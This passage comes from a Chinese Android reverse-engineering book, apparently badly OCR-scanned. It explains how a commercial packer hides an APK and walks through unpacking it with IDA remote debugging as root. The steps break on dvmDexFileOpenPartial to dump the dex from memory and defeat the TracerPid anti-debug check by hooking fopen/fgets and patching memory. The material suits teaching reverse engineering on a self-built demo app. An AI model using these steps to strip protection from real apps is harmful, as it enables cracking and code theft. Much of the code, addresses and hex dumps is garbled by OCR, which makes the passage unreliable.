public 方 法 ， 那 么 在 JavaScript 中 就 可 以 这 么 处 理 了 ， 先 获取 getClass 方 法 获取 这 个 对 象 ， 然 后 调用 这 个 对 象 中 的 一 些 特定 方法 
即 可 ， 因 为 Java 中 所 有 的 对 象 都 有 一 个 getClass 方 法 ， 而 这 个 方法 是 public 的 ， 同 时 能 够 返回 当前 对 象 。 所 以 在 Android 4.22 
后 有 了 一 个 注解 @Javascriptinterface， 只 有 这 个 注解 标识 的 方法 才能 在 JavaScript 中 调用 。 


7. 获 取 输 入 的 新 技能 
验证 结果 的 过 程 中 帮 现 了 一 个 扩 巧 ， 就 是 在 输入 很 长 的 文本 的 时 候 比 较 烦 琐 ， 可 以 借助 adb shell input text 命 令 来 实现 。 
TR: 
: 通过 dump 出 内 存 中 的 dex 数 据 ， 可 以 佛 挡 杀 佛 了， 不 管 apk 如 何 加 固 ， 最 终 都 是 需要 加 载 到 内 存 中 的 。 


:了解 WebView 的 安全 性 相关 知识 ， 比 如 在 WebView 中 JavaSctipt 对 象 名 称 做 一 次 混淆 还 是 有 必要 的 ， 防 止 被 恶意 网 站 调用 我 
们 的 本 地 隐私 方法 。 


可 以 尝试 调用 so 中 的 native 方 法 ， 在 知道 了 这 个 方法 的 定义 之 后 。 


· 用 adb shell input text 命 令 来 辅助 输入 。 
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24.1 加 元 原理 分 析 


先 用 一 个 案例 来 看 看 加 这 原理 。 首 先 目 己 弄 一 个 demo 程 序 ， 然 后 去 某 加 壳 网 站 上 加 固 一 下 ， 得 到 加 固 之 后 的 apk， 然 后 开 
始 破解 。 


1. 反 编译 apk 


解压 apk， 看 看 大 体 的 目录 ， 得 到 classes.dex 文 件 ， 然 后 用 dex2jar+jd-gui 得 到 Java 源 码 ， 如 图 24-1 所 示 。 


d KETTE Dplication.dass х | Native; 
в: n Native pplication | finally 
目 - Т NativeApplicati Di finally 
: finally 

java/lang/Exception 

java/1lang/Exception 

java/lang/Exception 


protected void attachBaseContext (Context par 
{ 
super.attachBaseContext (paramContext) ; 


- &3 baseDir : String 
9 attachBaseContext(Context) : void loadLibs (paramContext); 

o copylib(String) : void NativeApplication.load(this, "com.xingli.h 
m copylib(ZipFile, ZipEntry, File) : vo NativeApplication.run(this, "com.ijiami.re 


$9? getCRC32(Hle) : lo 


779 loadlibs(Context) : void protected void copyLib(String paramString)| 
€ onCreate() : void throws IOException 


9241 反 编 译 之 后 的 源码 
看 到 这 里 只 有 Application 的 壳 ， 而 且 这 个 是 加 固 之 后 的 特点 ， 都 是 这 两 个 Application 的 。 


使 用 apktool 来 反 编 译 apk， 获 取 资源 文件 信息 : 


<?xml version-"1.0" encoding="utf-8"?> 
«manifest android:versionCode="1" android:versionName-"1.0" package-"com.droider.crackme0201 


xmlns:android-"http: //schemas . android. com/apk/res/android"» 
«application android:theme-"f le АррТпете_ android: label= @string/app_ name" android:icor 


ic launcher" android:name id: d b 
<activity misipa "Receins titia acti ity main" 'android:name-" .MainActivity"] 
«intent-filter» 
«action android:name-"android.intent(gaction.MAIN" /> 
«category android:name-"android.intenX.category.LAUNCHER" /> 
«/intent-filter» 
«/activity» 


«/application» 
«/manifest» 


AH Application 


JST БАЗЕ EE eT DRESS ETATS КЫКЕ T И“, ELA fr ЛЧ f, ВААУ УВАЛИ“: assets 目 录 、 


libsHs&. Elallfgfdeozft. ixBERP&BAassetsEs&, 24-23. 
F3 
так ЕН RE === 大 小 
SEE dat) 133 K 


=H gyami.dat 2016/6/9.. E 


图 24-2 assets E 3& 
这 个 文件 ， 猿 想 这 个 可 能 就 是 处 理 之 后 的 源 apk 了 。 在 AndroidManifest.xml 中 看 到 了 入 口 的 SuperApplication 类 , F 
面 来 分 析 一 下 这 个 类 : 
protected void attachBaseContext (Context paramContext) 
I 首先 进行 加 载 lid 操作 
super.attachBaseContext (DagsffmContexr > 


loadLibsí[paramContezxt); 

NativeApplication.load(this, "ШШЕ ШЫ ld) 

NativeApplication.run(this, "com.ijiami.residconfusion.Confusionàpplication"); 
} 


这 里 一 般 都 是 在 attachBaseContext 方 法 中 进行 操作 的 ， 这 里 的 时 机 比较 早 ， 首 先 会 调用 loadLibs 方 法 进行 加 载 libs: 


protected void loadLibs (Context paramContext) 


baseDir - n—— — -——— аш). . <= Лу 用 的 files Н 
= пем AL 


if ((str != null) && (str.contains("x86"))) 


{ 
copyLib("x86"); 


' return; < copyLib 拷贝 指定 平台 的 so 文件 


copyLib ("arm"); 
return; 
] 
catch (IOException locallOExceptionl) 
{ 
try 
{ 
copyLib("arm"); 
return; 
] 
catch (IOException localIOException2) 
[ 
] 


这 里 区 分 不 同 的 平台 ， 然 后 拷贝 不 同 的 so 文件 ， 继 续 看 copyLib 方 法 : 


protected void copyLib(String paramString) 这 M< 个 是 需要 Pi p] HJ SO 
th ТОЕх j v 
p e 文件 ， 而 且 这 也 是 加 国之 


"assets/ijm 1ір/агтеарі/1ірехес.зо"; 
"assets/ijm lib/armeabi/libexecmain.so"; 


String strl 
String str2 - 


后 增加 的 so 文件 


strl = "assets/ijm lib/x86/libexec.so"; 
str2 = "аззесз/1]ш lib/x86/libexecmain.so"; 把 它们 拷贝 到 应 用 的 
yf files 目录 下 


ZipFile localZipFile = new TT ] ; 

ZipEntry localZipEntryl - localZipFile.getEntry(str1); 

if ((localZipEntryl != null) && (localZipEntryl.getCrc() != getCRC32(localFilel))) 
copyLib(localZipFile, localZipEntryl, localFilel); 

ZipEntry localZipEntry2 - localZipFile.getEntry(str2); 

if ((localZipEntry2 != null) gs (localZipEntry2.getCrc() != getCRC32(localFile2))) 
copyLib(localZipFile, localZipEntry2, localFile2); 

localZipFile.close(); 


可 以 看 到 ， 从 assets 目 录 下 把 增加 的 两 个 so 文件 libexec.so 和 libexecmain.so 拷 贝 到 应 用 程序 的 files 目 录 下 ， 可 以 去 看 看 
assets/jm_lib 目 录 下 的 so 文件 ， 如 图 24-3 所 示 。 


EVER FECE RE === A 小 


| libexec.so 2016/6/9 .. SO xt 270 KB 


[L| libexecmain.so 2016/6/9 .SO 文件 天 中 


图 24-3 so 文件 目录 


到 这 里 loadLibs 方 法 就 执行 完了 ， 下 面 就 开始 调用 NativeApplication 的 load 方 法 进行 加 载 数据 ， 继 续 看 NativeApplication 


25; 


public class NativeApplication 

[ -从 应 用 
static 
{ 


的 files 目录 中 加 载 这 两 个 so 文件 


System.load(SuperApplication.baseDir + "/11рехес.зо"); 


System.load(SuperApplication.baseDir + "/1ірехегстаіг.зо"); 


public static native boolean load(Application рагањАрр1ісатіоп, String param5tring); 


开始 从 应 用 程序 的 files 目 录 中 加 载 这 两 个 so 文件 ，load 方 法 也 是 一 个 native 方 法 ， 继 续 看 看 这 两 个 so 文件 内 容 。 


首先 用 IDA 打 开 libexecmain.so 文 件 ， 如 图 24-4 所 示 ， 但 是 友 现 ， 它 里 面 并 没有 什么 重要 信息 ， 连 JNI_OnLoad 函 数 都 没有 


内 容 。 
F| Functions window D m x | IDA View-A E3 Hex View-l ж. 


.Ltext: 


F 


Function name 


| E .Ltext: 
—cxa atexit .text: 
—txa finalize -text 
deinit T u © | text: 
—gnu_Unwind_Find_exidx e | text 
memcpy © j| text: 
abort | .text: 
. cxa begin cleanup .text: 
__сха type match .text: 
sub ВЕО .text: 
JNI OnLoad .text: 
JNI OnUnload .text:- 
sub COC .text: 
sub C24 .text- 
sub DF8 © | text: 
sub_E64 = -text: 
fl sub F78 Baits 


DDBBDU DB 
DDBBDU DB 
DDBBDU ов ESPORT JHI OnLoad 

:BDBBDDDUDBB JHI Опі оаа 
DBDBBDBU ad PUSH *R3,LR} 

: OG B? ELX deinit 
DDDBDBBLU об PUP 4R3,PC 
üaggüBCHB6 ; End of function JHI ünLoad 
DBBBC a6 
agdBBr DS 
ООВВОС 08 ` =============== $ U R ROUT I H E == 
DDDBDBBU DS 
DDDBDBBU DS 
DDDBBBU DS ESPORT JHI OnUnload 
DDDBDBDUDS JHI OnUnload 
DDDBDBBU DS Ba LR 
BBBDDBUBS ; End of function JHI ünUnload 


Па Га Га Га аъ Гаа 


924-4 IDA 打 开 libexecmainso 文 件 


继续 得 看 libexec.so 文 件 ， 如 图 24-5 所 示 。 


P Please confirm 


图 24-5 IDA 打 开 libexec.so 文 件 


可 惜 的 是 ， 打 开 提 示 so 文 件 格式 错误 ， 到 这 里 就 猜 到 了 ， 这 个 so 可 能 被 加 密 处 理 了 ，ELF 格 式 改 了 ， 点 击 Yes 继 续 强 制 打开 
之 后 ， 绸 使 用 Ctrl+S 查 看 so 的 各 个 段 信 息 ， 如 图 24-6 所 示 。 


现在 确定 ， 没 办 法 分 析 so 文 件 了 ,分析 到 这 里 ， 也 知道 了 大 体 加 密 流程 : 
1) 按照 惯例 把 源 apk 进 行 加 密 处 理 存 放 在 一 个 地 方 ， 通 过 分 析 猜 想 是 assets 目 录 下 的 jiami.dat 文 件 。 


Choose segment to Jump тео w - 


Name 

ЕҢ LOAD 
as EXIDX 
as LOAD 


Start 


000C 7D28 
ODOCBAAO 


End 

DOD7E320 
DODCSCFO 
00003194 


Align 

mempadge 01 
dword 04 
mempage 02 


a| extern 00003194 00003324 + P? P? ., ara 05 
P 
45| abs 0O0D39C0 0O0D39CC ; + P? , рага 0б 


一 


Line 1 of 5 


图 24-6 ”查看 so 中 的 段 信息 
2) 添加 过 Application: SuperApplication 类 在 这 个 过 的 attachContext 方 法 中 主要 做 了 两 件 事 : 
- 把 assets/ijm_lib 目 录 下 的 两 个 so 文件 copy 到 程序 的 fles 目 录 中 。 
: 调用 NativeApplication 的 load 方 法 ， 在 这 个 类 中 同时 也 把 上 面 的 两 个 so 文件 加 载 到 内 存 中 。 


3) 对 apk 的 加 密 都 是 放 在 底层 的 两 个 so 文件 中 操作 的 ， 通 过 IDA 去 分 析 这 两 个 so 文件 之 后 ， 发 现 核 心 功能 的 so 文件 被 加 密 
了 ，1IDA 打 开 是 看 不 到 具体 信息 了 。 


到 这 里 知道 加 固 之 后 的 特点 是 : 在 程序 的 assets 目 录 下 多 了 一 个 jiami.dat 文 件 和 两 个 so 文件 ， 同 时 这 两 个 so 文件 和 被 加 密 处 
理 了 ， 增 加 破解 难度 。 
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上 面 简单 分 析 了 加 密 的 原理 和 流程 ， 但 是 没有 继续 往 下 面 分 析 了 ， 因 为 这 不 是 本 草 讲解 的 重点 ， 本 章 的 重点 是 如 何 脱 挥 加 密 
的 壳 。 脱 壳 的 核心 残 一 个 : 给 dvmDexFileOpenPartial 函 数 下 断 点 ，dump 出 内 存 的 dex 文 件 即 可 ， 那 么 下 面 融 用 IDA 开 始 及 壳 
操作 了 。 

第 一 步 : 局 动 设备 中 的 android server 

进行 端口 转发 : 

adb forward tcp:23946 tcp:23946 

C:NUsersNVjiangweil-g»adb shell 

ѕһе11@ріѕсеѕ:/ $ su 

rootGpisces:/ # са /data 

root@pisces:/data # ./android_server 

IDA Android 32-bit remote debug server (ST) v1.19. Hex-Rays (c) 2004-2015 


Listening on port #23946... 


C:NUsersNMjiangweil-g»adb forward tcp:23946 tcp:23946 


第 二 步 : 用 debug 模 式 启动 程序 
代码 如 下 : 


аар shell am start -D -n com.droider.crackme0201/.MainActivity 


这 里 的 包 名 和 入 口 Activity 都 可 以 在 上 面 反 编译 之 后 的 AndroidManifest.xml 文 件 中 找到 |: 


C:\Users\jiangweil-g>adb shell am start -D -n com.droider.crackme0201/. 
MainActivity 
Starting: Intent ( cmp=com.droider.crackme0201/.MainActivity } 


第 三 步 : 双开 IDA 


一 个 用 于 静态 分 析 libdvm.so， 一 个 用 于 动态 调试 ， 如 图 24-7 所 示 。 


Л pm 
Library function |." Data B Regular function P Unexplored Bl Instruction External symbol 


f | Functions window LI Em X IDA View-A З 6] Нех View-1 


.text:0885777C ; dumDexFileOpenPartia 


- - .text:8885777C ЕХРОВТ 
dvminterpFindInterfaceMethod(ClassObject *,uint, Method... .text:0885777C  221dumDexFileOpenParti 


dvmDexFileOpenFromFd(int,DvmDex **) .text:0085777C 


.text:8805777C 


рр 
.text:88857788 
.text: 88857782 
.Ltext: 00857786 
„сех: 88857788 
.text :8885778R 
.text :8885778C 
.text:8885778E 
„сех: 88857798 


dvmDexChangeDex1(DvmbDex *,uchar *,исһаг) 
dvmDexChangeDex2(DvmDex *,ushort *,ushort) 
dvmDexGetResolvedClass(DvmDex const* ulnt) 


dvmDexGetResolvedMethod(DvmDex const*,uint) 
dvmDexGetResolvedField(DvmDex const*,uint) 
dvmDexSetResolvedString(DvmDex *,uint,StringObject *) 
dvmDexSetResolvedClass(DvmDex *,uint,ClassObject *) 
dvmDexSetResolvedMethod(DvmDex *,uint, Method *) 
dvmDexSetResolvedField(DvmDex * uint Field *) text - 80047792 
dvmDexCacheStatus(char const*) text:808857795 
dvmPrepareDexInMemory(uchar *,uint,DvmDex **) .text:00857798 
dvmGenerateRegisterMaps(DvmDex *) .text:88857790 
dvmSetBootPathExtraDex(DvmDex *) .text: 88047798 


„Сех: 80097 79А loc ^779f 
.text:8885779f 
-text: 0084779E 


ое МЫ МЫ E МЫ Б EE OO E CO O8 


9247 3k JX ҖАЕ XF hh bk 


记录 dvmDexFileOpenPartial 函 数 的 相对 地 址 4777C， 再 次 打开 一 个 IDA， 进 行 attach 调 试 进程 ， 如 图 24-8 所 示 。 


[32] com.droidercrackme0201 


图 24-8 ”附加 进程 


第 四 步 : 使 用 db 命令 attach 上 调试 器 


代码 如 下 : 


Јар -connect com.sun.jdi.SocketAttach:hostname-127.0.0.1,port-8700 
G:Misers'Xjiangweii-g»jdb -connect com.sun.jdi.Socketfüittach:hostname-127.8.8.1.port =8 700 


第 五 步 : XidvmDexFileOpenPartialEg2i P Brea 


进入 调试 页 面 之 后 ， 用 Ctrl+S 键 查找 libdvm.so 的 内 存 基 地 址 415BB000， 如 图 24-9 所 示 。 


Name 


аз) |ibdvm.so 
HIER: 41684000 41688000 
ЕН 


libdvm.so 


libdvm.so 41688000 4168F000 


ИТТ 


+ 
[|  libdvm| 


924-9 ”获取 so 的 基地 址 


将 第 三 步 中 获取 到 的 相对 地 址 加 上 基地 址 4777C+415BB000=4160277C， 得 到 了 dvmDex-FileOpenPartial 在 内 存 中 的 绝 
对 地 址 。 


注意 ， 这 里 还 有 一 个 更 方便 的 办 去 ， 束 是 直接 打开 Modules View， 如 图 24-10 所 示 。 


Load desktop... 
Delete desktop... 
Reset desktop 


Windows list 

Next window F6 
Previous window Shift-- F6 
Close window Alt--F3 
Focus command line 


Output window 
IDA View-PC 
General registers 


x 


Module: libdvm.so 
Threads 

Stack view 
Structures 


Enums 


ЕТЕТ 


424-10 Modules 8 
在 这 里 查找 libdvm.so 文 件 ， 如 图 24-11 所 示 。 


然后 双击 libdvm.so 文 件 ， 如 图 24-12 所 示 。 


Modules x Module: libdwm. zo 


/system/lib/libdvm.so 41586000 DDDD4000 


$$  libdm 


图 24-11 查找 libdvm.so 文 件 


КОЛГЕ: 


| Name Address 
{f| Z21dvmDexFileOpenPartialPKviPP6DvmDex | 4160277C 


Ж  dwmDexFileüpenPartial 
图 24-12 ”获取 函数 的 绝对 地 址 


查找 需要 下 断 点 的 函数 名 称 ， 看 到 这 里 的 绝对 地 址 也 是 4160277C。 这 里 有 两 种 方式 可 以 得 到 一 个 函数 在 内 存 中 的 绝对 地 
址 。 然 后 使 用 G 键 ， 直 接 跳 转 到 为数 处 ， 下 断 点 ， 如 下 所 示 : 


libdum.so:5168277C 221dumDexFileOpenPartialPKuiPPóDumDex 


е 

^ 1ірӣут.50:5916027#Е MOU R4, R2 

° libdum.so:5n1602780 MOUS R2, #0 

° libdum.so:41602782 BL _212dexFileParsePKhji 

° 1ibdum.so:41682786 MOU R5, RÜ 

° Пірӣут.ѕ0:51602788 CBNZ R8, loc 541682798 

° Bibdum.so:51682788 LDR R1, =(aDaluikum - 8x16 


第 六 步 : 设置 Debugger Options 选 项 


此 操作 能 够 让 程序 断 在 dvmDexFileOpenPartial 函 数 处 ， 如 图 24-13 所 示 。 


r- - | == 


Events Logzing 
[gl Suspend on debugging start [g] Segment modifications 
ir] Evaluate event condition on exit Thread start/exit 


Suspend on process entry point Library load/unload 
Suspend on thread ztart/exit ir] Breakpoint 
Suspend on library load/unload lebuzzing message | 


— 7 


| | Suspend on debugging message 


! Event condition ы 
Прї11оп= 
[al Feconstruct the stack 
[Г Show debugger breakpoint instructions 
[gl] Use hardware temporary breakpoints 
| | Autoload PIE files 


[gl] Set as just-in-time debugger 


x Edit exceptions — x Edit exceptions — _ Reload exceptions - _ Reload exceptions - 


| 


24-13 # € Debugger Options £ zi 


注意 : 上 面 的 第 四 步 、 第 五 步 、 第 六 步 没 有 顺序 ， 只 要 在 运行 之 前 设置 就 可 以 了 。 


第 七 步 : 运行 程序 


出 现 这 个 对 话 框 不 要 在 意 ， 一 路 点 击 Cancel 即 可 ， 如 图 24-14 所 示 。 


IDA could not find the file "/data/app-lib/com. droider. craclkmeD2D0l-1l/libexerc., su". 


If that file can be accessed, please specify its directory: 


/ data/app-lib/com. droider. er асрте0201-1 


о се 


Destination 


图 24-14 ”提示 对 话 框 


jdb 也 attach 上 了 调试 程序 : 


sers Njiangweii-g»jdb -connect com.sun.jdi.Socketfittachz:hostname-127.0.0.1. port -8788 


: М 
| Е H Ң) јача. lang -Throwable 
у BER JÆ 获 的 java-lang-Throwable 
在 初始 化 jab. .. 
> == 


—Е 471, ESbsfr£IdvmDexFileOpenPartial&FRSlrga, BEEE, ЕНШ iB, 18124-15377. 


24-15 ”运行 报错 


氮 击 OK 之 后 ， 出 现 了 下 面 对 话 框 ， 如 图 24-16 所 示 。 


CR Exception handling 


Ihe execution will be resumed after the exception. 


По vou want to pass the exception to the application" 


If vou answer vez. the application = exception handler 


will be executed if there 15 опе. 


Ihe control of the application might be lost. 


Charge exception definition 


Yes [pass to app) | Но Í[dizcard]| |5upend (доп t resume) 


图 24-16 ”报错 对 话 框 


再 次 点 击 任何 一 个 按钮 ， 都 会 退出 调试 页 面 ， 如 图 24-17 所 示 。 


p. О О see АЕйїїпшх/Апйго14 debugger = | Е (Р) gr р |: m] š 


Library function Data P Regular function | | Unexplored P Instruction 


| 


Debug View x 


=| IDA View-FUC 


”FFFFFFFF ` ` = 


24-17 退出 调试 页 面 


再 重新 尝试 一 次 上 面 的 流程 ， 开 始 调 试 ， 但 是 错误 是 一 样 的 ， 到 这 里 束 立 马 想到 了 ， 之 前 第 8 草 说 的 IDA 调 试 so 遇 到 的 那个 
问题 : 反 调 试 检 测 。 其 实 这 是 现在 加 固 平台 必要 选择 的 一 种 方式 ， 反 调试 原理 很 简单 ， 束 是 在 程序 运行 最 早 的 时 机 ， 比 如 so 加 
载 的 时 候 即 JNI_OnLoad 万 法 中 ， 读 取 本 进程 的 status 文 件 ， 查 看 TracerPid 字 段 是 否 为 0%， 如 果 不 为 0， 那 么 就 表示 自己 的 进程 
馈 别 人 跟 路 了 ， 也 丈 是 attach 了 ， 这 时 候 立 马 退 出 程序 ， 下 面 使 用 IDA 在 attach 进 程 成 功 之 后 ， 查 看 本 进程 的 status 信 息 : 


C:NUsersNjJiangweil-g>adb shell 
shell@pisces:/ $ su 
rootQGpisces:/ # ps |grep com.droider 


uO a91 6815 14197 868896 38948 ffffffff 400da910 t com.droider.crackme0201 
rootG8pisces:/ # cat /proc/6815/status 

Name: der.crackme0201 

State: © (tracing stop) 

Tgid: 6815 

Pid: 6815 

PPid: 14197 

Пла: 10091 10091 10091 10091 

Gid: 10091 10091 10091 10091 


FDSize: 256 


看 到 这 里 的 TracerPid 为 24336， 不 为 0， 表 示 被 24336 进 程 attach 了 ， 那 么 可 以 查看 一 下 这 个 进程 是 谁 : 


root@pisces:/ # ps |grep 24336 
root 24336 24316 10556 8972 ffffffff 40106300 S ./android_server 
root@pisces:/ #- 


这 个 进程 就 是 在 设备 中 安插 的 android server， 它 用 于 和 1DA 进 行 通信 。 


到 这 里 ， 可 以 看 到 应 用 做 了 反 调 试 检测 ， 按 照 上 一 章 的 内 容 ， 可 以 给 JNI_OnLoad 函 数 下 断 点 ， 然 后 找到 检测 代码 ， 把 对 应 
的 ARM 指 令 改 成 空 指令 ， 检 测 失 效 了 ， 但 是 这 里 两 个 so 文件 被 处 理 了 ，1DA 没 法 分 析 了 ， 那 么 该 怎么 办 呢 ? 


如 何 应 对 反 调 试 呢 ? 可 以 借助 IDA 修 改 寄存 器 和 内 存 数 据 的 特性 来 做 到 。 首 先 上 面 分 析 了 反 调 试 的 原理 ， 一 般 在 native 代 码 
去 做 检测 的 话 ， 都 是 用 fopen 系 统 消 数 打开 status 文 件 ， 然 后 用 fgets 消 数 读 取 一 行 的 内 容 ， 一 般 操作 文件 都 是 用 fopen 消 数 。 


那么 思路 就 有 了 ， 既 然 反 调试 肯定 用 到 了 fopen 和 和 fgets 这 两 个 水 数 ， 那 么 直接 像 给 dvmDexFileOpenPartial| 下 断 点 的 方式 
一 样 ， 给 这 两 个 为数 下 断 点 ， 然 后 运行 到 fgets 断 点 处 的 时 候 ， 发 现 如 果 是 读 取 TracerPid 这 行内 容 的 时 候 ， 融 开始 修改 内 和 存 内 
容 ， 把 TracerPid 字 上 段 的 值 改 成 0， 或 者 修改 RO 寄存 器 的 内 容 ， 跳 过 反 调 试 检测 。 


这 两 个 函数 是 在 libc.so 文 件 中 的 ， 可 以 把 设备 的 /system/lib/libc.so 使 用 adb pull 到 本 地 即 可 ， 然 后 用 IDA 得 到 相对 地 址 ， 
在 调试 页 面 得 到 基地 址 ， 然 后 相 加 得 到 绝对 地 址 ， 跳 转 即 可 。 但 是 这 里 不 用 这 种 复杂 的 方式 ， 有 两 种 方式 可 以 进行 跳 转 。 


第 一 种 方式 : 在 Modules 界 面 找 到 libc.so， 然 后 再 找到 这 两 个 国 数 ， 融 可 以 得 到 它们 的 绝对 地 址 了 ， 如 图 24-18 所 示 。 


Modules Module: libe. so В 


Мате 


tul тореп 


$$ Ғғорец 
图 24-18 3f реп Җ 83 Е 


然后 使 用 G 键 ， 跳 转 下 断 点 即 可 ， 如 下 所 示 : 


libc.so0:588059B78 fopen 


libc.s0:50849B78 
libc.s0:58049B78 var 1C- -8x1C€ 
= libc.so:58849B78 
° libc.so:58049B72 HOU R7, R8 
° libc.so:^8049B7^ HOU R8, R1 
^ libc.so:58849B76 ADD R1, SP, #0х20+џак 1C 
^ libc.so:58859B78 BL _ Sflags 
^ libc.so:^58049B7C LDR R5, -(unk ^887FFD8 - 8x54808549B82) 
° lBibc.so:588049B7E ADD R5, PC ; unk ^4887FFD8 


第 二 种 方式 : PERHARI, MERGE, ЖЫДЫ PUERA RRA HTE, SUÉ24-19BTm. 


UP Jump to address 


Титр address  tgets 


图 24-19 # AN E ACE SUE 


下 断 点 ， 如 下 所 示 : 


libc.so:^88499FC fgets 


С) 
° libc.so:n08019ñ08 SUBS.U R9, R1, #0 
^ llibc.so:^48859685 LDR ВЗ, -(unk ^887FFD8 - 8x58854988E) 
^ llibc.so:^88496086 MOU R7, RB 
^ [libc.so:^88496088 HOU R4, R2 
^ llibc.so:^88496860 арр R3, PC ; ипк ^887FFD8 
.© dibc.so:^8845968C BGT loc 50039112 
libc.so:^48849808E 


到 这 里 惑 给 这 两 个 国 数 下 好 了 断 点 ， 当 然 这 里 还 需要 给 dvmDexFileOpenpPartial 国 数 下 断 点 ， 一 切 弄 好 了 之 后 ， 这 时 候 有 再 
次 运行 ， 如 下 所 示 : 


libc.so:^8849B78 fopen 
libc.s0:5080549B78 
libc.so:50849B78 var 1C- -8x1C€ 
480549B78 


^ 8059B72 
40049874 MOU 


R7, R8 
R8, R1 


PC Z 
^ libc.so:5^8059B78 BL | sfDCB Gx2F 
^ libc.so:5480049B7C LDR R5, DCB 
° libc.so:^8859B7E ADD R5, DCB 
° libc.so:^808459B80 HOU R6, DCB 
-° |libc.so:400498B82 CBNZ R8, DCB 
libc .50:40049B84 D 
libc.s0:40049B84 loc_40049B84 DCB 
libc.so:^80549B8^ DCB 


libc .so:46849B84 MOUS R4, DCB 
libc.so:^48049B86 B 


Ma 一 = > 


= rx rx ú. гъ гъ гъ гъ - 


停 在 了 fopen 断 点 处 ， 使 用 F8 键 单 步调 试 ， 看 到 R7 寄 存 器 中 的 内 容 


x&/proc/http://www.hzcourse.com/resource/readBook? 


path-z/openresources/teach ebook/uncompressed/17266/OEBPS/Text/... 


к= libcutils.so:^48899B26 
libcutils.so:^480099B27 
libcutils.s0:^40099B828 
libcutils.s0:^48099829 
libcutils.s5s0:^4ü8099B2f 


“м 


«^^ Fu (Ó л м O O чы 


R1, R7-libcutils.so:ueuent open socket*2528| 


， 直 接点 击 R7 查 看 全 部 内 容 ， 
DGB BUx2F 
DEB Ux; 
DLE 0x72 
DLE 上 xD 
DLE Úx63 


I! ^ NAE RENE 


如 下 所 示 : 


ч 
; p 
= ñ 
; d 
= к 


libcutils.so:^88990B2B 
libcutils.so:40099B2C 
libcutils.so:4009982D 
libcutils.so:40099B2E 
libcutils.so:h88900B2F 
libcutils.so:40099830 
libcutils.so:40099831 
libcutils.so:40099832 
libcutils.so:400998633 
libcutils.so:40099834 
libcutils.50:^48099B35 
libcutils.so:^h8890B36 
libcutils.so:^40099B37 
libcutils.s0:^408099B38 
libcutils.so:h8800B39 
libcutils.so:^4089090B3f 
libcutils.s0:^08099B3B 
libcutils.50:^580899B3C 
libcutils.so:^40809090B3D 
libcutils.so:^4ü899B3E 
libcutils.s0:^48099B3F 
libcutils.so:hB88900BA^B0 
libcutils.so:^408990H!31 
libcutils.s0:^408099B5? 
libcutils.so:h889090Bh3 
libcutils.zo:^40800B4A 
libcutils.so:40099845 
libcutils.so:40099846 


DCE 
DEB 
DEB 
DGB 
DEB 
DLB 
DGB 
DCB 
DLE 
DLE 
DLE 
DEB 
DEB 
DCB 
DCB 
DLE 
DLE 
DLE 
DLE 
DLE 
DLE 
DEB 
DEB 
DCB 
DCE 
DEB 
DEB 
DCB 


Вх2Е 
Вх 73 
Вхё5 
HxóL 
Bx ó ü 
Bx2F 
Od 
Вх åD 
Shii 
Hx åL 
x09 
Hx åE 
Hx 65 

B 
Вход 
Вх 65 
Hx Z 
Bx t5 
Bxz67 
Вх ZE 
Bx61 
Hx ZM 
Bx 72 
Hxà1 
Bx 63 
Вхё5 
Hx ZE 
Вх 071 


тт = m M a Ыш е 


шы c T D = 


T ov) ш "> rr Ë c 


d 


内 容 有 点 长 ， 大 致 的 内 容 是 /proc/self/cmdline.debug.atrace.app_cmdlines， 这 个 是 干什么 的 ? 看 看 这 个 目录 内 容 : 


C:NUsersNjiangweil-g>adb shell 
shell@pisces:/ Š su 

rootGpisces:/ # cd /proc/self 
rootGpisces:/proc/self # 11 |grep cmdline 
-r--r--r-- root root 0 2016-06-28 14:15 cmdline 
rootGOpisces:/proc/self # cat cmdline 

k shell/2000:4129 root-pisces:/rroc/selft 


发 现 没有 这 个 文件 内 容 ， 只 有 cmdline 文 件 ， 但 是 可 以 先 不 管 它 了 ， 知 道 这 个 肯定 不 是 读 取 status 文 件 的 ， 那 直接 略 过 这 个 


断后， 拟 击 F9 键 运行 到 下 一 个 断后 ， 


libc.so:^58859B78 
libc.so:^5^8849B78 
libc.so:58849B78 
libc.so:^8849B78 


libc.s0:5^48849B72 
libc.s0:540849B75 
° llibc.so:58059B76 
° llibc.so:58059B78 
° libc.so:58059B7C 
° libc.so:580849B7E 
° llibc.so:58859B88 
° llibc.so:58059B82 
| libc.so:^8859B84 
libc.s0:^8849B84 
| libc.s0:^48849B84 
I libc.s0o:^48849B84 
` ° lAibc.so:^8059B86 
! libc.so:^4880549B88 


中 间 过 程 先 忽略 ， 一 路 用 F9 键 ， 直 到 运行 到 了 fopen 这 个 断 点 ， 如 下 所 示 : 


fopen 


uar 1C= -8x1C€ 


RALRY 


R7, R8 


R8, R1 
ADD R1, R7-[stack]:BEFDBFCA 
BL — SDCB 6x2F ; 
LDR RS, DCB 60x78 ;|p N| 
ADD RS, DCB 80x72 ;Ir 
HOU Ró, DCB @хбЕ ;lo 
CBNZ RO, DCB 60x63 ;[c 
DCB 8x2F „; ыыра 
loc 58839884 т Á —-jx H ibo fr 
DCB 8x36 ;|6 | 
MOUS В», DCB 8x33 ;|3 
B lot pCB 60x39 ;|9 


果然 ， 这 里 使 用 了 fopen 来 读 取 status 文 件 了 ， 点 击 R7 寄 存 器 查看 全 部 内 容 ， 如 下 所 示 : 


[stack]:BEFDBFEM 
[stack] -BEFDBFES 
[stack] :-BEFDBFE6 
[stack] :-BEFDBFE7 
[stack] -BEFDBFE8 
[stack] :-BEFDBFE9 
[stack] :-BEFDBFER 
[stack] -BEFDBFEB 
[stack] :-BEFDBFEE 
[stack] :-BEFDBFED 
[stack] :-BEFDBFEE 
[stack] :-BEFDBFEF 
[stack] :-BEFDBFDB 
[stack] -BEFDBFD1 
[stack] :-BEFDBFD2 
[stack] :-BEFDBFD3 
[stack] -BEFDBFDA 
[stack] :-BEFDBFD5S 


这 个 16396 就 是 本 进程 的 id : 


rootüa5l1techn:2 H ps igrep соп. 
51 89456H 29976 FFFFfEFFf 40049b74 t com.droider.c 
rootliabltechn*^ Í 


ul ai1"'6 


DLE 
DLE 
DLE 
DLE 
DLE 
DLE 
DLE 
DLE 
DLE 
DLE 
DLE 
DLE 
DLE 
DGE 
DLE 
DLE 
DGE 
DLE 


Hx 2 F 
Dx zu 
Hx Z 2 
xoF 
Uxà3 
Hx ZF 
Bx 
Hx Jő 
Hx 33 
Их. 
бх 36 
Hx ZF 
Hx 7 3 
xz 
日 x 1 
Hx rH 
х 5 
Hx Z 3 


到 这 里 ， 下 一 个 断 点 肯定 是 fgets， 所 以 点 击 F9 键 进入 到 fgets 断 点 处 ， 如 下 所 示 : 


л ton "т мл QIM Ww ы Ch hg гу CD "т D w 


